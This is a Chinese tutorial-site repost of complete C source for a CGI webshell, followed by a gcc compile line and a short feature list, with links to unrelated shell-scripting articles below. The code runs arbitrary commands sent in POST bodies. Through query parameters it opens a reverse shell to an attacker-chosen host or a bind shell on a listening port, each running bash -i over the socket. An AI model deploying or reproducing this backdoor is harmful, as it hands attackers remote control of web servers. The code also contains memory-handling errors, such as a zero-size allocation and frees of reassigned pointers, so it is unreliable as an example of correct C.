首页 / LINUX / LinuxC代码实现cgishell

LinuxC代码实现cgishell

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了LinuxC代码实现cgishell，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含6568字，纯文字阅读大概需要10分钟。

内容图文

C语言实现cgi webshell

#include 
#include 
#include 
#include 
#include 
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include 
#include 
#include 
  
 
  
struct get_data {
    char key[100];
    char value[100];
};
  
  
void exec_cmd(void){
    printf("Content-type:text/html\n\n");
    FILE *command;
    int size = atoi(getenv("CONTENT_LENGTH"));
    if(size > 1500) {
        printf("Error> Post Data is very big");
        exit(0);
    }
    char *buffer = malloc(size+1);
    fread(buffer,1,size,stdin);
    command = popen(buffer,"r");
    char caracter;
  
    while((caracter = fgetc(command))){
        if(caracter == EOF) break;
        printf("%c",caracter);
    }
  
    pclose(command);
    free(buffer);
    exit(0);
}
  
int error(char *err){
    perror(err);
    exit(EXIT_FAILURE);
}
  
void parser_get(void){
    printf("Content-type:text/html\n\n");
  
    struct get_data *s;
    char *GET = (char *)getenv("QUERY_STRING");
    int i,number_of_get = 0,size_get = strlen(GET);
  
    if(strlen(GET) > 100)
        exit(0);
  
    s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  
    int element = 0;
    int positionA = 0;
    int positionB = 0;
    int id = 0;
  
    for(i=0;i<size_get;i++){
        if(GET[i] == '='){
            id = 1;
            s[element].key[positionA] = '\0';
            positionB = 0;
            continue;
        }
  
        if(GET[i] == '&'){
            id = 0;
            s[element].key[positionA] = '\0';
            s[element].value[positionB] = '\0';
            positionA = 0;
            positionB = 0;
            element++;
            continue;
        }
  
        if(id==0){
            s[element].key[positionA] = GET[i];
            positionA++;
        }
  
        if(id==1){
            s[element].value[positionB] = GET[i];
            positionB++;
        }
  
        if(i == size_get-1 && GET[size_get-1] != '&'){
            s[element].key[positionA] = '\0';
            s[element].value[positionB] = '\0';
            element++;
            continue;
        }
  
  
    }
  
    char *host_x = (char *)malloc(100);
    host_x = NULL;
    char *type_x = (char *)malloc(100);
    type_x = NULL;
    int port_x = 0;
  
    for(i=0;i<element;i++){
        if(strcmp(s[i].key,"type")==0)
            type_x = s[i].value;
        else if(strcmp(s[i].key,"host")==0)
            host_x = s[i].value;
        else if(strcmp(s[i].key,"port")==0)
            port_x = atoi(s[i].value);
    }
  
    free(s);
  
    if(type_x == NULL){
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
        printf("Something is wrong ... !!!");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
        printf("You must specify a target host ...");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if(strcmp(type_x,"reverse") == 0){
        struct sockaddr_in addr;
        int msocket;
        msocket = socket(AF_INET,SOCK_STREAM,0);
  
        if(msocket < 0){
            printf("Fail to create socket");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port_x);
        addr.sin_addr.s_addr = inet_addr(host_x);
  
        memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  
        if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
            printf("Fail to connect\n");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        printf("Connect with sucess !!!\n");
  
        if(fork() == 0){
            close(0); close(1); close(2);
            dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
            execl("/bin/bash","bash","-i", (char *)0);
            close(msocket);
            exit(0);
        }
  
        free(host_x);
        free(type_x);
        exit(0);
    } else if (strcmp(type_x,"bind")==0) {
  
        int my_socket, cli_socket;
        struct sockaddr_in server_addr,cli_addr;
  
        if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            printf("Fail to create socket");
            exit(1);
        }
  
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(port_x);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);
  
        int optval = 1;
        setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  
  
        if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
            printf("Fail to bind");
            free(host_x);
            free(type_x);
            exit(1);
        }
  
        if (listen(my_socket, 1) < 0){
            printf("Fail to listen");
            free(host_x);
            free(type_x);
            exit(1);
        } else {
            printf("Listen on port %d\n",port_x);
        }
  
        if(fork() == 0){
            socklen_t tamanho = sizeof(struct sockaddr_in);
  
            if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
                exit(0);
  
            }
  
            close(0); close(1); close(2);
            dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  
            execl("/bin/bash","bash","-i",(char *)0);
            close(cli_socket);
  
        }
  
    }
    free(host_x);
    free(type_x);
    exit(0);
}
  
void load_css_js(void){
printf("\n\
\n\
");
  
}
  
int main(void){
    if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
    if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
    printf("Content-type:text/html\n\n");
  
    printf("\n");
    printf("\t\n\t\n");
    printf("\t\t C CGI SHELL =D \n");
    load_css_js();
    printf("\n\t\n");
    printf("\t\n");
printf(" \n\
    \n\
    C - CGI SHELL
C0d3r: webshell | REVERSE/BIND\n\
    \n\
    <input type=\"text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\
    <input id=\"lol\" type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">
\n\
    \n\
    \n\
    \n\
        Reverse Connection: Stop\n\
        Host/IP:\n\
        Port:<input type=\"text\" id='port_rev' onkeypress='return change_div(event,this);' onKeyUp='update_div(this,\"cmd_rev\");' />\n\
        <input type='button' value='Start Connection' style=\"margin-left: 15.5em;\" onclick=\"connect_xxx('rev_s')\"/>\n\
        \n\
        \n\
        Bind Connection: Stop\n\
        Port To Listen:<input type=\"text\" id='port_bin' style=\"width:50px\" onkeypress='return change_div(event,this);' onKeyUp='update_div(this,\"cmd_bin\");'>\n\
        <input type='button' value='Start Connection' style=\"margin-left: 15.5em;\" onclick=\"connect_xxx('bind_s')\"/>\n\
        \n\
    \n\
    \n\
    \n\
\n\
");
    return 0;
}

编译：
gcc shell.c -o shell.cgi

功能：
1.反弹获得shell（target作为客户端）

LinuxC代码实现cgishell - 文章图片

2.监听获得shell（target作为服务端）

LinuxC代码实现cgishell - 文章图片

3.命令行执行

LinuxC代码实现cgishell - 文章图片

内容总结

以上是互联网集市为您收集整理的LinuxC代码实现cgishell全部内容，希望文章能够帮你解决LinuxC代码实现cgishell所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/150311.html

来源：【匿名】

【上一篇】linux文件文件夹递归监控【下一篇】Linux下安装GD

更多 ►

【LinuxC代码实现cgishell】教程文章相关的互联网学习教程文章

老李分享：《Linux Shell脚本攻略》要点（二）

poptest是国内唯一一家培养测试开发工程师的培训机构，以学员能胜任自动化测试，性能测试，测试工具开发等工作为目标。如果对课程感兴趣，请大家咨询qq：908821478。Linuxshell是测试开发工程师的基本功之一，所以在poptest测试开发课堂上加入了大量的linuxshell的课程，为了学员开发跨平台的测试平台打基础。 1、cat cat -s //多个空白行压缩成一个 cat *.txt | tr -s ‘\n‘ //移除空白行 cat -n //加行号2、find...

Linux C/C++调用shell命令后获取shell返回值【代码】

Linux C/C++调用shell命令后获取shell返回值项目中C/C++调用shell命令后，某系处理返回值的过程是以“临时文件”的方式进行；即shell命令执行后将返回值存放在临时文件（如temp.txt），C/C++程序再访问文件，获取shell的返回值。最经典的就是调用WiFi（iwlist wlan0 scan ）扫描指令查询WiFi节点，然后解析获取WiFi数量、名称、信号强度、加密方式等信息。通过“临时文件”的方式交互数据，是比较简单、易用和易理解的方式，在多进...

Linux的shell脚本的语句，函数，检测服务，启动脚本的练习【图】

一.if语句650) this.width=650;" src="/upload/getfiles/default/2022/11/7/20221107042726687.jpg" title="Screenshot from 2017-11-11 20-01-52.png" />650) this.width=650;" src="/upload/getfiles/default/2022/11/7/20221107042726972.jpg" title="Screenshot from 2017-11-11 20-09-41.png" />650) this.width=650;" src="/upload/getfiles/default/2022/11/7/20221107042727203.jpg" title="Screenshot from 2017-11-11...

Linux Shell 高级编程技巧1---深入讨论（awk、<<）【代码】

1.深入讨论（awk、<<） 1.1.深入讨论awk 记录和域，模式和动作，正则表达式和元字符基础教程中已经介绍条件和逻辑操作符 < 小于 >= 大于等于 <= 小于等于 == 等于 != 不等于 ~ 匹配正则表达式 !~ 不匹配正则表达式 && and || or ! not ...

【shell】Linux shell for 循环详解【代码】

CASE20210510 - Linux shell脚本基础详解【代码】

1.变量shell中特殊变量：序号变量含义1$0当前脚本的文件名2$n传递给脚本或函数的参数。n是一个数字，表示第几个参数3$#传递给脚本或函数的参数个数4$*传递给脚本或函数的所有参数5$@传递给脚本或函数的所有参数，被双引号包含时，与$*稍有不同6$?上个命令的退出状态，或函数的返回值7$-显示shell使用的当前选项8$$当前shell进程ID，对于shell脚本，就是这些脚本所在的进程ID9$!后台运行的最后一个进程的ID号Linux环境变量：查看变...

linux shell cat 命令

cat：查看文件的内容、连接文件、创建一个或多个文件和重定向输出到终端或文件用法：cat [选项] [文件]1. $ cat hello.txt显示hello.txt文本文件中的内容 2. $ cat -n file-n选项，可以显示文件的内容和行号 3. $ cat -b file-b选项，与-n类似，但只标识非空白行的行号（空白行仍显示） 4. $ cat -e file-e选项，将在每一行的末尾显示“$”字符，在需要将多行内容转换成一行时非常有用。 5. $ cat只输入cat命令的话，它只是接收标...

linux shell--算术运算【代码】

求和：方法一、使用命令替换法：#!/bin/bashread -p ‘input number a...‘ numA read -p ‘input number b...‘ numB #这里有两个要注意的点，一：等号两边不能有空格、二：小括号之间不能有空格 sum=$(($numA+$numB))echo"${numA} + ${numB} = ${sum}" 方法二、直接运算#!/bin/bashread -p ‘input number a...‘ numA read -p ‘input number b...‘ numBsum=$[$numA+$numB] echo"${numA} + ${numB} = ${sum}" 原文：http://www...

linux shell学习之shell流程控制

在linux shell编程中，流程控制结构与语句，也算是shell脚本中的重点了，不了解的朋友，跟随脚本小编一起来学习下吧。linux控制流结构学习。一，shell控制流结构1.控制结构 6.while循环 2.if then else语句 7.until循环 3.case 语句 8.break控制 5.for循环 9.continue控制1，if then else if 条件1 如果条件1为真 then 那么命令1 执行命令1 elif 条件2 如果条件1不成立而条件2成立 then 那么命令2 执行命令2 else 如...

win10上使用Xshell通过ssh连接Linux【代码】【图】

Windows 10上现在能安装Linux子系统了，正好最近.Net Core也逐渐发展起来了，我也就在自己电脑上搞了一下在Windows 10上安装Ubuntu的过程就不用说了，都是流程性的东西然后配置完基础性的东西以后，习惯性的打算用Xshell通过SSH登录过去然后emmmm连接失败，好吧然后么，百度了下解决办法，大部分都是在说修改ssh的port，说是Win10会占用22端口，所以连接失败，既然如此，我就只能修改ssh_config这个配置文件了然后改了以后并且重置...

linux crontab定时任务运行shell脚本（shell执行sql文件）

今天做个linux定时任务（每晚12点把表汇总）。顺便写个博客记录一下~~为什么用linux定时任务，而不是在项目加定时任务呢？原因就是防止因为各种原因项目崩溃。。所以就用了更加稳定的linux定时任务（我是这么想的( ^_^ )）。起初我感觉很简单，以为顶多半小时就搞定了，，，结果从10点弄到12点半才搞定（主要是我英语太渣和数据库报错导致）。。。︿(￣︶￣)︿废话到此结束---------------crontab 格式 *　　*　　*　　*　　* ...

用Xshell连接Linux系统时输入反斜杠成W

用Xshell连接Linux系统时输入反斜杠成W只是xshell 设置问题在FILE（文件）——>Properties（属性）里面》》外观如下标注位置配置改为： Courier New 即ok原文：http://362155856.blog.51cto.com/6312063/1660901

linux shell实现随机数几种方法分享(date,random,uuid)【代码】

在日常生活中，随机数实际上经常遇到，想丢骰子，抓阄，还有抽签。呵呵，非常简单就可以实现。那么在做程序设计，真的要通过自己程序设计出随机数那还真的不简单了。现在很多都是操作系统内核会提供相应的api，这些原始参数是获取一些计算机运行原始信息，如内存，电压，物理信号等等，它的值在一个时间段可以保证是唯一的了。好了，废话我就不说了。呵呵。shell脚本程序我们有那些获得随机数方法呢？一、通过时间获得随机数（date...

Xshell设置密钥登录确保Linux【代码】

用Xshell设置密匙登陆服务器，第一步、使用Xshell生成密钥我们打开熟悉的XSHELL软件，然后在工具-新建用户密钥生成向导。到了生成密钥参数界面，我们这里需要选择RSA密钥类型，以及密钥长度可以选择1024或者我这里选择2048.然后点击下一步按钮。继续下一步，我们需要给我们设置的私钥加密。点击下一步，生成密钥。公钥格式选择SSH2-OPENSSH，我们可以复制公钥以及保存为文件后完成。第二步、上传公钥至服务器中A - 将我们生成的lao...

Linux Shell经典面试题【代码】

查空行 awk‘/^$/{print NR}‘ demo1.txt求某一列的和 awk‘{sum+=$2} END {print "求和："sum}‘ demo2.txt数字排序 sort -n -t ‘‘ -k 2 demo3.txt sort -t ‘‘ -k 2nr demo3.txt搜索指定目录下文件内容 grep -r ‘666‘ /root/ | cut -d ‘:‘ -f 1 | sort -u筛选出单词长度大于3的单词 echo"I may not be able to change the past, but I can learn from it." | awk -F "[ ,.]"‘{for(i=1;i<=NF;i++){if(length($i)>3){print...

LINUX - 最热教程

Xrdp - 通过Windows的RDP连接Linux远程...VMware中Linux虚拟机挂载主机共享文件夹...Linux双网卡配置虚拟机下Linux安装好Nginx后，宿主机无...linux下安装postgresql并配置远程图形桌...Linux命令--exportfs命令详解 linux 终端printf打印显示乱码问题修正 Linux下Shell的for循环语句N种写法 Linux下创建nginx脚本-start、stop、re...SUSELinux安装MySQL

首页 / LINUX / LinuxC代码实现cgishell

LinuxC代码实现cgishell

内容导读

内容图文

C - CGI SHELL

内容总结

内容备注

内容手机端

【LinuxC代码实现cgishell】教程文章相关的互联网学习教程文章

LINUX - 最新教程

LINUX - 最热教程